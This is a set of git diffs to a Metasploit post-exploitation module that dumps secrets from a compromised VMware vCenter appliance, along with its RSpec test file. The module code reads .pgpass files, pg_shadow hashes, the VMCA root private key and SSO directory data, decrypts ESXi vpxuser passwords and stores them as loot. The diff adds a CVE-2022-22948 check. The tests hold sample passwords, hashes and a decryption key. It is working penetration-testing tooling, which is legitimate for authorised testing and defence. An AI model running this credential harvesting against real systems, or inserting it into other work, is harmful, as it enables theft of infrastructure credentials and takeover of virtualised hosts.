-          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
-        },
-        'Privileged' => true
+          'Reliability' => [ ],
+          'SideEffects' => [ IOC_IN_LOGS ]
+        }
       )
     )
     register_advanced_options([
@@ -71,14 +75,8 @@ class MetasploitModule < Msf::Post
   end
 
   # this is only here because of the SSO portion, which will get moved to the vcenter lib once someone is able to provide output to test against.
-  def vsphere_bin
-    {
-      'ldapsearch' => '/opt/likewise/bin/ldapsearch'
-    }
-  end
-
   def ldapsearch_bin
-    vsphere_bin['ldapsearch']
+    '/opt/likewise/bin/ldapsearch'
   end
 
   def psql_bin
@@ -96,40 +94,39 @@ class MetasploitModule < Msf::Post
   def run
     get_vcsa_version
 
-    print_status('Validating target ...')
+    print_status('Validating target')
     validate_target
 
-    print_status('Gathering vSphere SSO domain information ...')
+    print_status('Gathering vSphere SSO domain information')
     vmdir_init
 
-    if print_status('Extracting PostgreSQL database credentials ...')
-      get_db_creds
+    print_status('Extracting PostgreSQL database credentials')
+    get_db_creds
 
-      print_status('Extract ESXi host vpxuser credentials ...')
-      enum_vpx_user_creds
-    end
+    print_status('Extract ESXi host vpxuser credentials')
+    enum_vpx_user_creds
 
     if datastore['DUMP_VMDIR'] && vcenter_infrastructure
-      print_status('Extracting vSphere SSO domain secrets ...')
+      print_status('Extracting vSphere SSO domain secrets')
       vmdir_dump
     end
 
     if datastore['DUMP_VMAFD']
-      print_status('Extracting certificates from vSphere platform ...')
+      print_status('Extracting certificates from vSphere platform')
       vmafd_dump
       if datastore['DUMP_SPEC'] && vcenter_management
-        print_status('Searching for secrets in VM Guest Customization Specification XML ...')
+        print_status('Searching for secrets in VM Guest Customization Specification XML')
         enum_vm_cust_spec
       end
     end
+
     if is_root?
       print_status('Retrieving .pgpass file')
       retrieved_pg_creds = false
-      retrieved_vpx_creds = false
       pgpass_contents = process_pgpass_file
 
       pgpass_contents.each do |p|
-        extra_service_data = {F
+        extra_service_data = {
           address: p['hostname'] =~ /localhost|127.0.0.1/ ? Rex::Socket.getaddress(rhost) : p['hostname'],
           port: p['port'],
           service_name: 'psql',
@@ -140,8 +137,9 @@ class MetasploitModule < Msf::Post
         }
         print_good(".pgpass creds found: #{p['username']}, #{p['password']} for #{p['hostname']}:#{p['database']}")
         store_valid_credential(user: p['username'], private: p['password'], service_data: extra_service_data, private_type: :password)
-        next unless p['database'] == 'postgres'
-        next if retrieved_pg_creds == true
+        next if p['database'] != 'postgres'
+
+        next unless retrieved_pg_creds == false
 
         creds = query_pg_shadow_values(p['password'], p['username'], p['database'])
         retrieved_pg_creds = true unless creds.nil?
@@ -161,12 +159,10 @@ class MetasploitModule < Msf::Post
 
           create_credential_login(login_data)
         end
-        # XXX we need to do like above but for query_vpx_creds(pg_password, vcdb_user, vcdb_name, vc_sym_key_raw)
       end
       path = store_loot('.pgpass', 'text/plain', session, pgpass_contents, 'pgpass.json')
       print_good("Saving the /root/.pgpass contents to #{path}")
     end
-    
   end
 
   def vmdir_init
@@ -191,7 +187,7 @@ class MetasploitModule < Msf::Post
     self.base_dn = vsphere_domain_dn
     vprint_status("vSphere SSO Domain DN: #{base_dn}")
 
-    vprint_status('Extracting dcAccountDN and dcAccountPassword via lwregshell on local vCenter ...')
+    vprint_status('Extracting dcAccountDN and dcAccountPassword via lwregshell on local vCenter')
     vsphere_domain_dc_dn = get_domain_dc_dn
     unless is_dn?(vsphere_domain_dc_dn)
       fail_with(Msf::Exploit::Failure::Unknown, 'Could not determine vmdir dcAccountDN from lwregshell')
@@ -238,23 +234,23 @@ class MetasploitModule < Msf::Post
     p = store_loot('vmdir', 'LDIF', rhost, vmdir_ldif, 'vmdir.ldif', 'vCenter vmdir LDIF dump')
     print_good("LDIF Dump: #{p}")
 
-    print_status('Processing vmdir LDIF (this may take several minutes) ...')
+    print_status('Processing vmdir LDIF (this may take several minutes)')
     ldif_file = ::File.open(p, 'rb')
     ldif_data = Net::LDAP::Dataset.read_ldif(ldif_file)
 
-    print_status('Processing LDIF entries ...')
+    print_status('Processing LDIF entries')
     entries = ldif_data.to_entries
 
-    print_status('Processing SSO account hashes ...')
+    print_status('Processing SSO account hashes')
     vmware_sso_hash_entries = entries.select { |entry| entry[:userpassword].any? }
     process_hashes(vmware_sso_hash_entries)
 
-    print_status('Processing SSO identity sources ...')
+    print_status('Processing SSO identity sources')
     vmware_sso_id_entries = entries.select { |entry| entry[:vmwSTSConnectionStrings].any? }
     process_sso_providers(vmware_sso_id_entries)
 
     if datastore['DUMP_LIC']
-      print_status('Extract licenses from vCenter platform ...')
+      print_status('Extract licenses from vCenter platform')
       vmware_license_entries = entries.select { |entry| entry[:vmwLicSvcLicenseSerialKeys].any? }
       get_vc_licenses(vmware_license_entries)
     end
@@ -287,7 +283,7 @@ class MetasploitModule < Msf::Post
   def get_vecs_entry(store_name, vecs_entry)
     store_label = store_name.upcase
 
-    vprint_status("Extract #{store_label} key ...")
+    vprint_status("Extract #{store_label} key")
     key = get_vecs_private_key(store_name, vecs_entry['Alias'])
     if key.nil?
       print_bad("Could not extract #{store_label} private key")
@@ -296,7 +292,7 @@ class MetasploitModule < Msf::Post
       print_good("#{store_label} Key: #{p}")
     end
 
-    vprint_status("Extract #{store_label} certificate ...")
+    vprint_status("Extract #{store_label} certificate")
     cert = validate_x509_cert(vecs_entry['Certificate'])
     if cert.nil?
       print_bad("Could not extract #{store_label} certificate")
@@ -311,7 +307,7 @@ class MetasploitModule < Msf::Post
   end
 
   def get_vmca_cert
-    vprint_status('Extract VMCA_ROOT key ...')
+    vprint_status('Extract VMCA_ROOT key')
 
     unless file_exist?('/var/lib/vmware/vmca/privatekey.pem') && file_exist?('/var/lib/vmware/vmca/root.cer')
       print_error('Could not locate VMCA_ROOT keypair')
@@ -329,7 +325,7 @@ class MetasploitModule < Msf::Post
     p = store_loot('vmca', 'PEM', rhost, vmca_key, 'VMCA_ROOT.key', 'vCenter VMCA root CA private key')
     print_good("VMCA_ROOT key: #{p}")
 
-    vprint_status('Extract VMCA_ROOT cert ...')
+    vprint_status('Extract VMCA_ROOT cert')
     vmca_cert_b64 = read_file('/var/lib/vmware/vmca/root.cer')
 
     vmca_cert = validate_x509_cert(vmca_cert_b64)
@@ -538,7 +534,7 @@ class MetasploitModule < Msf::Post
   end
 
   def get_idp_creds
-    vprint_status('Fetching objectclass=vmwSTSTenantCredential via vmdir LDAP ...')
+    vprint_status('Fetching objectclass=vmwSTSTenantCredential via vmdir LDAP')
     idp_keys = get_idp_keys(base_fqdn, vc_psc_fqdn, base_dn, bind_dn, shell_bind_pw)
     if idp_keys.nil?
       print_error('Error processing IdP trusted certificate private key')
@@ -551,7 +547,7 @@ class MetasploitModule < Msf::Post
       return
     end
 
-    vprint_status('Parsing vmwSTSTenantCredential certificates and keys ...')
+    vprint_status('Parsing vmwSTSTenantCredential certificates and keys')
 
     # vCenter vmdir stores the STS IdP signing credential under the following DN:
     #    cn=TenantCredential-1,cn=<sso domain>,cn=Tenants,cn=IdentityManager,cn=Services,<root dn>
@@ -640,7 +636,7 @@ class MetasploitModule < Msf::Post
       enc_cert_der = []
       der_idx = 0
 
-      print_status('Validating data encipherment key ...')
+      print_status('Validating data encipherment key')
       while der_idx <= enc_cert_len - 1
         enc_cert_der << xmldoc.at_xpath("/ConfigRoot/encryptionKey/e[@id=#{der_idx}]").text.to_i
         der_idx += 1
@@ -809,13 +805,55 @@ class MetasploitModule < Msf::Post
     }
 
     store_valid_credential(user: vcdb_user, private: vcdb_pass, service_data: extra_service_data)
+    print_status('Checking for VPX Users')
+    creds = query_vpx_creds(vcdb_pass, vcdb_user, vcdb_name, vc_sym_key_raw)
+    if creds.nil?
+      print_bad('No VPXUSER entries were found')
+      return
+    end
+    creds.each do |cred|
+      extra_service_data = {
+        address: cred['ip_address'],
+        service_name: 'vpx',
+        protocol: 'tcp',
+        workspace_id: myworkspace_id,
+        module_fullname: fullname,
+        origin_type: :service,
+        realm_key: Metasploit::Model::Realm::Key::WILDCARD,
+        realm_value: vcdb_name
+      }
+      if cred.key? 'decrypted_password'
+        print_good("VPX Host creds found: #{cred['user']}, #{cred['decrypted_password']} for #{cred['ip_address']}")
+        credential_data = {
+          username: cred['user'],
+          private_data: cred['decrypted_password'],
+          private_type: :password
+        }.merge(extra_service_data)
+      else
+        print_good("VPX Host creds found: #{cred['user']}, #{cred['password_hash']} for #{cred['ip_address']}")
+        credential_data = {
+          username: cred['user'],
+          private_data: cred['password_hash'],
+          private_type: :nonreplayable_hash
+          # this is encrypted, not hashed, so no need for the following line, leaving it as a note
+          # jtr_format: Metasploit::Framework::Hashes.identify_hash(cred['password_hash'])
+        }.merge(extra_service_data)
+      end
+
+      login_data = {
+        core: create_credential(credential_data),
+        status: Metasploit::Model::Login::Status::UNTRIED
+      }.merge(extra_service_data)
+
+      create_credential_login(login_data)
+    end
   end
 
   def validate_sts_cert(test_cert)
     cert = validate_x509_cert(test_cert)
     return false if cert.nil?
 
-    vprint_status('Downloading advertised IDM tenant certificate chain from http://localhost:7080/idm/tenant/ on local vCenter ...')
+    vprint_status('Downloading advertised IDM tenant certificate chain from http://localhost:7080/idm/tenant/ on local vCenter')
 
     idm_cmd = cmd_exec("curl -f -s http://localhost:7080/idm/tenant/#{base_fqdn}/certificates?scope=TENANT")
 
@@ -845,15 +883,6 @@ class MetasploitModule < Msf::Post
   end
 
   def validate_target
-    # this enumeration phase will also go away once the sso part moves to lib
-    vprint_status('Enumerating universal vSphere binaries ...')
-    vsphere_bin.each do |k, v|
-      vprint_good("\t#{k}: #{v}")
-      unless command_exists?(v)
-        fail_with(Msf::Exploit::Failure::NoTarget, "Could not find #{v}")
-      end
-    end
-
     if vcenter_management
       vc_db_type = get_database_type
       unless vc_db_type == 'embedded'

--- a/modules/post/linux/gather/vcenter_secrets_dump.rb
+++ b/modules/post/linux/gather/vcenter_secrets_dump.rb
@@ -58,6 +58,7 @@ class MetasploitModule < Msf::Post
           [ 'URL', 'https://github.com/shmilylty/vhost_password_decrypt' ],
           [ 'CVE', '2022-22948' ],
           [ 'URL', 'https://pentera.io/blog/information-disclosure-in-vmware-vcenter/' ],
+          [ 'URL', 'https://github.com/ErikWynter/metasploit-framework/blob/vcenter_gather_postgresql/modules/post/multi/gather/vmware_vcenter_gather_postgresql.rb' ]
         ],
         'Notes' => {
           'Stability' => [ CRASH_SAFE ],

--- a/modules/post/linux/gather/vcenter_secrets_dump.rb
+++ b/modules/post/linux/gather/vcenter_secrets_dump.rb
@@ -92,8 +92,24 @@ class MetasploitModule < Msf::Post
     vc_type_embedded || vc_type_infrastructure
   end
 
+  def check_cve_2022_22948
+    # https://github.com/PenteraIO/CVE-2022-22948/blob/main/CVE-2022-22948-scanner.sh#L5
+    cmd_exec('stat -c "%G" "/etc/vmware-vpx/vcdb.properties"') == 'cis'
+  end
+
   def run
     get_vcsa_version
+
+    if check_cve_2022_22948
+      print_good('Vulnerable to CVE-2022-22948')
+      report_vuln(
+        host: rhost,
+        port: rport,
+        name: name,
+        refs: ['CVE-2022-22948'],
+        info: "Module #{fullname} found /etc/vmware-vpx/vcdb.properties owned by cis group"
+      )
+    end
 
     print_status('Validating target')
     validate_target

--- a/spec/lib/msf/core/post/vcenter/database_spec.rb
+++ b/spec/lib/msf/core/post/vcenter/database_spec.rb
@@ -7,220 +7,268 @@ RSpec.describe Msf::Post::Vcenter::Database do
     mod
   end
 
-  context 'gets pgpass correctly' do
-    it 'from failing' do
-      allow(subject).to receive(:file_exist?).and_return(false)
-      expect(subject.process_pgpass_file).to be_nil
+  describe '#process_pgpass_file' do
+    context 'when the file does not exist' do
+      it 'returns nil' do
+        allow(subject).to receive(:file_exist?).and_return(false)
+        expect(subject.process_pgpass_file).to be_nil
+      end
     end
-    it 'from empty file' do
-      allow(subject).to receive(:file_exist?).and_return(true)
-      allow(subject).to receive(:read_file).and_return('')
-      expect(subject.process_pgpass_file).to be_nil
+
+    context 'when the file is empty' do
+      it 'returns nil' do
+        allow(subject).to receive(:file_exist?).and_return(true)
+        allow(subject).to receive(:read_file).and_return('')
+        expect(subject.process_pgpass_file).to be_nil
+      end
     end
-    it 'from file contents' do
-      allow(subject).to receive(:file_exist?).and_return(true)
-      allow(subject).to receive(:read_file).and_return('localhost:5432:replication:replicator:BN^qgk&a)Ee2dK@|
+
+    context 'when the file has several credentials' do
+      it 'returns a list of hashes with the credentials' do
+        allow(subject).to receive(:file_exist?).and_return(true)
+        allow(subject).to receive(:read_file).and_return('localhost:5432:replication:replicator:BN^qgk&a)Ee2dK@|
 127.0.0.1:5432:replication:replicator:BN^qgk&a)Ee2dK@|
 /var/run/vpostgres:5432:replication:replicator:BN^qgk&a)Ee2dK@|
 localhost:5432:postgres:postgres:i23rYgoPBQwpn!5
 127.0.0.1:5432:postgres:postgres:i23rYgoPBQwpn!5')
-      expect(subject.process_pgpass_file).to eq([
-        {
-          'database' => 'replication',
-          'hostname' => 'localhost',
-          'password' => 'BN^qgk&a)Ee2dK@|',
-          'port' => '5432',
-          'username' => 'replicator'
-        },
-        {
-          'database' => 'replication',
-          'hostname' => '127.0.0.1',
-          'password' => 'BN^qgk&a)Ee2dK@|',
-          'port' => '5432',
-          'username' => 'replicator'
-        },
-        {
-          'database' => 'replication',
-          'hostname' => '/var/run/vpostgres',
-          'password' => 'BN^qgk&a)Ee2dK@|',
-          'port' => '5432',
-          'username' => 'replicator'
-        },
-        {
-          'database' => 'postgres',
-          'hostname' => 'localhost',
-          'password' => 'i23rYgoPBQwpn!5',
-          'port' => '5432',
-          'username' => 'postgres'
-        },
-        {
-          'database' => 'postgres',
-          'hostname' => '127.0.0.1',
-          'password' => 'i23rYgoPBQwpn!5',
-          'port' => '5432',
-          'username' => 'postgres'
-        }
-      ])
+        expect(subject.process_pgpass_file).to eq([
+          {
+            'database' => 'replication',
+            'hostname' => 'localhost',
+            'password' => 'BN^qgk&a)Ee2dK@|',
+            'port' => '5432',
+            'username' => 'replicator'
+          },
+          {
+            'database' => 'replication',
+            'hostname' => '127.0.0.1',
+            'password' => 'BN^qgk&a)Ee2dK@|',
+            'port' => '5432',
+            'username' => 'replicator'
+          },
+          {
+            'database' => 'replication',
+            'hostname' => '/var/run/vpostgres',
+            'password' => 'BN^qgk&a)Ee2dK@|',
+            'port' => '5432',
+            'username' => 'replicator'
+          },
+          {
+            'database' => 'postgres',
+            'hostname' => 'localhost',
+            'password' => 'i23rYgoPBQwpn!5',
+            'port' => '5432',
+            'username' => 'postgres'
+          },
+          {
+            'database' => 'postgres',
+            'hostname' => '127.0.0.1',
+            'password' => 'i23rYgoPBQwpn!5',
+            'port' => '5432',
+            'username' => 'postgres'
+          }
+        ])
+      end
     end
-    it 'from file contents with * as port' do
-      allow(subject).to receive(:file_exist?).and_return(true)
-      allow(subject).to receive(:read_file).and_return('localhost:*:replication:replicator:BN^qgk&a)Ee2dK@|
-127.0.0.1:5432:replication:replicator:BN^qgk&a)Ee2dK@|
-/var/run/vpostgres:5432:replication:replicator:BN^qgk&a)Ee2dK@|
-localhost:5432:postgres:postgres:i23rYgoPBQwpn!5
-127.0.0.1:5432:postgres:postgres:i23rYgoPBQwpn!5')
-      expect(subject.process_pgpass_file).to eq([
-        {
-          'database' => 'replication',
-          'hostname' => 'localhost',
-          'password' => 'BN^qgk&a)Ee2dK@|',
-          'port' => '5432',
-          'username' => 'replicator'
-        }
-      ])
+
+    context 'when the file has * for a port in the credentials' do
+      it 'returns a list of hashes with the port set to 5432' do
+        allow(subject).to receive(:file_exist?).and_return(true)
+        allow(subject).to receive(:read_file).and_return('localhost:*:replication:replicator:BN^qgk&a)Ee2dK@|')
+        expect(subject.process_pgpass_file).to eq([
+          {
+            'database' => 'replication',
+            'hostname' => 'localhost',
+            'password' => 'BN^qgk&a)Ee2dK@|',
+            'port' => '5432',
+            'username' => 'replicator'
+          }
+        ])
+      end
     end
   end
 
-  context 'gets pg_shadow values' do
-    it 'from failing to find command' do
-      allow(subject).to receive(:command_exists?).and_return(false)
-      expect(subject.query_pg_shadow_values('test', 'test', 'test')).to be_nil
+  describe '#query_pg_shadow_values' do
+    context 'when the command does not exist' do
+      it 'returns nil' do
+        allow(subject).to receive(:command_exists?).and_return(false)
+        expect(subject.query_pg_shadow_values('test', 'test', 'test')).to be_nil
+      end
     end
-    it 'from failing to get a valid entry' do
-      allow(subject).to receive(:command_exists?).and_return(true)
-      allow(subject).to receive(:cmd_exec).and_return('this is not valid')
-      expect(subject.query_pg_shadow_values('test', 'test', 'test')).to eq([])
+
+    context 'when the command fails to find an entry' do
+      it 'returns an empty array' do
+        allow(subject).to receive(:command_exists?).and_return(true)
+        allow(subject).to receive(:cmd_exec).and_return('this is not valid')
+        expect(subject.query_pg_shadow_values('test', 'test', 'test')).to eq([])
+      end
     end
-    it 'with a valid entry' do
-      allow(subject).to receive(:command_exists?).and_return(true)
-      allow(subject).to receive(:cmd_exec).and_return('postgres|md5fdb13b980a01e3d1ae99b5b55b6e4303
-replicator|md5c2a01981014a380b63c0c7c66ad77ba9
-archiver|
-vc|md53b5a9fc0dd6c99567e9ca27c459b43d9
-vumuser|md5fc719b1b56f02981027379fd15125feb
-cns|md5d92e4534c059354dee12a7cc9a79faff')
-      expect(subject.query_pg_shadow_values('test', 'test', 'test')).to eq([
-        { 'password_hash' => 'md5fdb13b980a01e3d1ae99b5b55b6e4303', 'user' => 'postgres' },
-        { 'password_hash' => 'md5c2a01981014a380b63c0c7c66ad77ba9', 'user' => 'replicator' },
-        { 'password_hash' => 'md53b5a9fc0dd6c99567e9ca27c459b43d9', 'user' => 'vc' },
-        { 'password_hash' => 'md5fc719b1b56f02981027379fd15125feb', 'user' => 'vumuser' },
-        { 'password_hash' => 'md5d92e4534c059354dee12a7cc9a79faff', 'user' => 'cns' }
-      ])
+
+    context 'when the command returns several entries' do
+      it 'returns an array of hashes with the credentails' do
+        allow(subject).to receive(:command_exists?).and_return(true)
+        allow(subject).to receive(:cmd_exec).and_return("postgres|md5fdb13b980a01e3d1ae99b5b55b6e4303\nreplicator|md5c2a01981014a380b63c0c7c66ad77ba9\nvc|md53b5a9fc0dd6c99567e9ca27c459b43d9\nvumuser|md5fc719b1b56f02981027379fd15125feb\ncns|md5d92e4534c059354dee12a7cc9a79faff")
+        expect(subject.query_pg_shadow_values('test', 'test', 'test')).to eq([
+          { 'password_hash' => 'md5fdb13b980a01e3d1ae99b5b55b6e4303', 'user' => 'postgres' },
+          { 'password_hash' => 'md5c2a01981014a380b63c0c7c66ad77ba9', 'user' => 'replicator' },
+          { 'password_hash' => 'md53b5a9fc0dd6c99567e9ca27c459b43d9', 'user' => 'vc' },
+          { 'password_hash' => 'md5fc719b1b56f02981027379fd15125feb', 'user' => 'vumuser' },
+          { 'password_hash' => 'md5d92e4534c059354dee12a7cc9a79faff', 'user' => 'cns' }
+        ])
+      end
+    end
+
+    context 'when the command returns several entries and one has no password hash' do
+      it 'returns an array of hashes with the credentails without the hashless credential' do
+        allow(subject).to receive(:command_exists?).and_return(true)
+        allow(subject).to receive(:cmd_exec).and_return('postgres|md5fdb13b980a01e3d1ae99b5b55b6e4303
+  archiver|')
+        expect(subject.query_pg_shadow_values('test', 'test', 'test')).to eq([
+          { 'password_hash' => 'md5fdb13b980a01e3d1ae99b5b55b6e4303', 'user' => 'postgres' }
+        ])
+      end
     end
   end
 
-  context 'gets pg_shadow values' do
-    it 'from failing to find command' do
-      allow(subject).to receive(:command_exists?).and_return(false)
-      expect(subject.query_vpx_creds('test', 'test', 'test')).to be_nil
+  describe '#query_pg_shadow_values' do
+    context 'when the command does not exist' do
+      it 'returns nil' do
+        allow(subject).to receive(:command_exists?).and_return(false)
+        expect(subject.query_vpx_creds('test', 'test', 'test')).to be_nil
+      end
     end
-    it 'from failing to get a valid entry' do
-      allow(subject).to receive(:command_exists?).and_return(true)
-      allow(subject).to receive(:cmd_exec).and_return('this is not valid')
-      expect(subject.query_vpx_creds('test', 'test', 'test')).to eq([])
+
+    context 'when the command fails to find an entry' do
+      it 'returns an empty array' do
+        allow(subject).to receive(:command_exists?).and_return(true)
+        allow(subject).to receive(:cmd_exec).and_return('this is not valid')
+        expect(subject.query_vpx_creds('test', 'test', 'test')).to eq([])
+      end
     end
-    it 'with a valid entry' do
-      # combination of https://github.com/rapid7/metasploit-framework/pull/16465#issuecomment-1117587575
-      # and https://github.com/shmilylty/vhost_password_decrypt
-      allow(subject).to receive(:command_exists?).and_return(true)
-      allow(subject).to receive(:cmd_exec).and_return('vpxuser|*tktZGW50GH4BEOXyWCr9WTu2PSMGWSvcqEsuAMnwcNuFO/rQPRsOyygRRY/WaM3IOI/BrqcThiaiM3j4Jw+KtA==|192.168.20.20|192.168.20.10|192.168.20.10
-vpxuser|*ZdvmNiLEXzZL/uhdW6Zb4Px4RR72iD+xftdA0n9hJ8xpFNJW/axpyKMQ8BJWIFTzzoxQnAm2PaX486yExLX7qg==|192.168.20.20|192.168.20.15|test1.local')
-      expect(subject.query_vpx_creds('test', 'test', 'test')).to eq([
-        {
-          'dns_name' => '192.168.20.10',
-          'encrypted_password' =>
-            '*tktZGW50GH4BEOXyWCr9WTu2PSMGWSvcqEsuAMnwcNuFO/rQPRsOyygRRY/WaM3IOI/BrqcThiaiM3j4Jw+KtA==',
-          'ip_address' => '192.168.20.10',
-          'local_ip' => '192.168.20.20',
-          'user' => 'vpxuser'
-        },
-        {
-          'dns_name' => 'test1.local',
-          'encrypted_password' =>
-          '*ZdvmNiLEXzZL/uhdW6Zb4Px4RR72iD+xftdA0n9hJ8xpFNJW/axpyKMQ8BJWIFTzzoxQnAm2PaX486yExLX7qg==',
-          'ip_address' => '192.168.20.15',
-          'local_ip' => '192.168.20.20',
-          'user' => 'vpxuser'
-        }
-      ])
+
+    context 'when the command returns valid entries without a symkey' do
+      it 'returns an array of hashes with the credentials' do
+        # combination of https://github.com/rapid7/metasploit-framework/pull/16465#issuecomment-1117587575
+        # and https://github.com/shmilylty/vhost_password_decrypt
+        allow(subject).to receive(:command_exists?).and_return(true)
+        allow(subject).to receive(:cmd_exec).and_return("vpxuser|*tktZGW50GH4BEOXyWCr9WTu2PSMGWSvcqEsuAMnwcNuFO/rQPRsOyygRRY/WaM3IOI/BrqcThiaiM3j4Jw+KtA==|192.168.20.20|192.168.20.10|192.168.20.10\nvpxuser|*ZdvmNiLEXzZL/uhdW6Zb4Px4RR72iD+xftdA0n9hJ8xpFNJW/axpyKMQ8BJWIFTzzoxQnAm2PaX486yExLX7qg==|192.168.20.20|192.168.20.15|test1.local")
+        expect(subject.query_vpx_creds('test', 'test', 'test')).to eq([
+          {
+            'dns_name' => '192.168.20.10',
+            'encrypted_password' =>
+              '*tktZGW50GH4BEOXyWCr9WTu2PSMGWSvcqEsuAMnwcNuFO/rQPRsOyygRRY/WaM3IOI/BrqcThiaiM3j4Jw+KtA==',
+            'ip_address' => '192.168.20.10',
+            'local_ip' => '192.168.20.20',
+            'user' => 'vpxuser'
+          },
+          {
+            'dns_name' => 'test1.local',
+            'encrypted_password' =>
+            '*ZdvmNiLEXzZL/uhdW6Zb4Px4RR72iD+xftdA0n9hJ8xpFNJW/axpyKMQ8BJWIFTzzoxQnAm2PaX486yExLX7qg==',
+            'ip_address' => '192.168.20.15',
+            'local_ip' => '192.168.20.20',
+            'user' => 'vpxuser'
+          }
+        ])
+      end
     end
-    it 'with a valid entry and symkey' do
-      # combination of https://github.com/rapid7/metasploit-framework/pull/16465#issuecomment-1117587575
-      # and https://github.com/shmilylty/vhost_password_decrypt
-      allow(subject).to receive(:command_exists?).and_return(true)
-      allow(subject).to receive(:cmd_exec).and_return('vpxuser|*SN2otuvNvGRSC29lxhU4XQbgNOMyVawGF4UHA38w2zq59tX0WzkgkQTNBJSJpHvBvkYwyiR8xNAv1oquEOOLvQ==|192.168.20.20|192.168.20.15|test1.local')
-      expect(subject.query_vpx_creds('test', 'test', 'test', 'f1d0d054e43ac880809c354cec681b3433e36fc4ea6b1480de05b7b86c3506cd')).to eq([
-        {
-          'dns_name' => 'test1.local',
-          'encrypted_password' =>
-          '*SN2otuvNvGRSC29lxhU4XQbgNOMyVawGF4UHA38w2zq59tX0WzkgkQTNBJSJpHvBvkYwyiR8xNAv1oquEOOLvQ==',
-          'ip_address' => '192.168.20.15',
-          'local_ip' => '192.168.20.20',
-          'user' => 'vpxuser',
-          'decrypted_password' => '-KOU.80J\I0n\Pcqya3F0af=z5Ix-5.u'
-        }
-      ])
+
+    context 'when the command returns valid entries with a symkey' do
+      it 'returns an array of hashes with the credentials with a decrypted_password field' do
+        # combination of https://github.com/rapid7/metasploit-framework/pull/16465#issuecomment-1117587575
+        # and https://github.com/shmilylty/vhost_password_decrypt
+        allow(subject).to receive(:command_exists?).and_return(true)
+        allow(subject).to receive(:cmd_exec).and_return('vpxuser|*SN2otuvNvGRSC29lxhU4XQbgNOMyVawGF4UHA38w2zq59tX0WzkgkQTNBJSJpHvBvkYwyiR8xNAv1oquEOOLvQ==|192.168.20.20|192.168.20.15|test1.local')
+        expect(subject.query_vpx_creds('test', 'test', 'test', 'f1d0d054e43ac880809c354cec681b3433e36fc4ea6b1480de05b7b86c3506cd')).to eq([
+          {
+            'dns_name' => 'test1.local',
+            'encrypted_password' =>
+            '*SN2otuvNvGRSC29lxhU4XQbgNOMyVawGF4UHA38w2zq59tX0WzkgkQTNBJSJpHvBvkYwyiR8xNAv1oquEOOLvQ==',
+            'ip_address' => '192.168.20.15',
+            'local_ip' => '192.168.20.20',
+            'user' => 'vpxuser',
+            'decrypted_password' => '-KOU.80J\I0n\Pcqya3F0af=z5Ix-5.u'
+          }
+        ])
+      end
     end
-    it 'with a valid entry and bad symkey' do
-      # combination of https://github.com/rapid7/metasploit-framework/pull/16465#issuecomment-1117587575
-      # and https://github.com/shmilylty/vhost_password_decrypt
-      allow(subject).to receive(:command_exists?).and_return(true)
-      allow(subject).to receive(:cmd_exec).and_return('vpxuser|*SN2otuvNvGRSC29lxhU4XQbgNOMyVawGF4UHA38w2zq59tX0WzkgkQTNBJSJpHvBvkYwyiR8xNAv1oquEOOLvQ==|192.168.20.20|192.168.20.15|test1.local')
-      expect(subject.query_vpx_creds('test', 'test', 'test', 'bad0d054e43ac880809c354cec681b3433e36fc4ea6b1480de05b7b86c3506cd')).to eq([
-        {
-          'dns_name' => 'test1.local',
-          'encrypted_password' =>
-          '*SN2otuvNvGRSC29lxhU4XQbgNOMyVawGF4UHA38w2zq59tX0WzkgkQTNBJSJpHvBvkYwyiR8xNAv1oquEOOLvQ==',
-          'ip_address' => '192.168.20.15',
-          'local_ip' => '192.168.20.20',
-          'user' => 'vpxuser'
-        }
-      ])
+
+    context 'when the command returns valid entries with an invalid symkey' do
+      it 'returns an array of hashes with the credentials with a decrypted_password field' do
+        # combination of https://github.com/rapid7/metasploit-framework/pull/16465#issuecomment-1117587575
+        # and https://github.com/shmilylty/vhost_password_decrypt
+        allow(subject).to receive(:command_exists?).and_return(true)
+        allow(subject).to receive(:cmd_exec).and_return('vpxuser|*SN2otuvNvGRSC29lxhU4XQbgNOMyVawGF4UHA38w2zq59tX0WzkgkQTNBJSJpHvBvkYwyiR8xNAv1oquEOOLvQ==|192.168.20.20|192.168.20.15|test1.local')
+        expect(subject.query_vpx_creds('test', 'test', 'test', 'bad0d054e43ac880809c354cec681b3433e36fc4ea6b1480de05b7b86c3506cd')).to eq([
+          {
+            'dns_name' => 'test1.local',
+            'encrypted_password' =>
+            '*SN2otuvNvGRSC29lxhU4XQbgNOMyVawGF4UHA38w2zq59tX0WzkgkQTNBJSJpHvBvkYwyiR8xNAv1oquEOOLvQ==',
+            'ip_address' => '192.168.20.15',
+            'local_ip' => '192.168.20.20',
+            'user' => 'vpxuser'
+          }
+        ])
+      end
     end
   end
 
   # XXX need to add a real user test
-  context 'gets vpx users' do
-    it 'from failing to find command' do
-      allow(subject).to receive(:command_exists?).and_return(false)
-      expect(subject.get_vpx_users('test', 'test', 'test', 'test')).to be_nil
+  describe '#get_vpx_users' do
+    context 'when the command does not exist' do
+      it 'returns nil' do
+        allow(subject).to receive(:command_exists?).and_return(false)
+        expect(subject.get_vpx_users('test', 'test', 'test', 'test')).to be_nil
+      end
     end
-    it 'from failing to get a valid entry' do
-      allow(subject).to receive(:command_exists?).and_return(true)
-      allow(subject).to receive(:cmd_exec).and_return('this is not valid')
-      expect(subject.get_vpx_users('test', 'test', 'test', 'test')).to eq([])
+
+    context 'when the command does not return expected content' do
+      it 'returns empty array' do
+        allow(subject).to receive(:command_exists?).and_return(true)
+        allow(subject).to receive(:cmd_exec).and_return('this is not valid')
+        expect(subject.get_vpx_users('test', 'test', 'test', 'test')).to eq([])
+      end
     end
-    it 'with a valid entry' do
-      allow(subject).to receive(:command_exists?).and_return(true)
-      allow(subject).to receive(:cmd_exec).and_return('localhost|127.0.0.1|root|*')
-      # we need to convert the XML:Doc back to a string so it can be tested correctly
-      expect(subject.get_vpx_users('test', 'test', 'test', 'test')).to eq([
-        {
-          'fqdn' => 'localhost',
-          'ip' => '127.0.0.1',
-          'user' => 'root',
-          'password' => ''
-        }
-      ])
+
+    context 'when the command succeeds' do
+      it 'returns array of hashes with credentials' do
+        allow(subject).to receive(:command_exists?).and_return(true)
+        allow(subject).to receive(:cmd_exec).and_return('localhost|127.0.0.1|root|*')
+        # we need to convert the XML:Doc back to a string so it can be tested correctly
+        expect(subject.get_vpx_users('test', 'test', 'test', 'test')).to eq([
+          {
+            'fqdn' => 'localhost',
+            'ip' => '127.0.0.1',
+            'user' => 'root',
+            'password' => ''
+          }
+        ])
+      end
+      # XXX need to add a valid test where we actually decrypt something
     end
-    # XXX need to add a valid test where we actually decrypt something
   end
 
-  context 'gets vpx customizations xml' do
